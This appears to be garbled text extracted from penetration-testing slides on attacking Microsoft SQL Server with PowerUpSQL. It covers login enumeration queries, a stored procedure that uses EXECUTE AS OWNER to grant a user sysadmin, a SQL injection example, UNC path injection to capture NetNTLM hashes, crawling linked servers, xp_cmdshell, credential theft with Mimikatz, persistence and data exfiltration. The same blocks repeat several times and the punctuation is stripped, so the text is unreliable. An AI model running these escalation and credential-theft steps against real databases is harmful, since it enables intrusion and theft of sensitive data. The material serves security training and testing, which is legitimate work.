Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
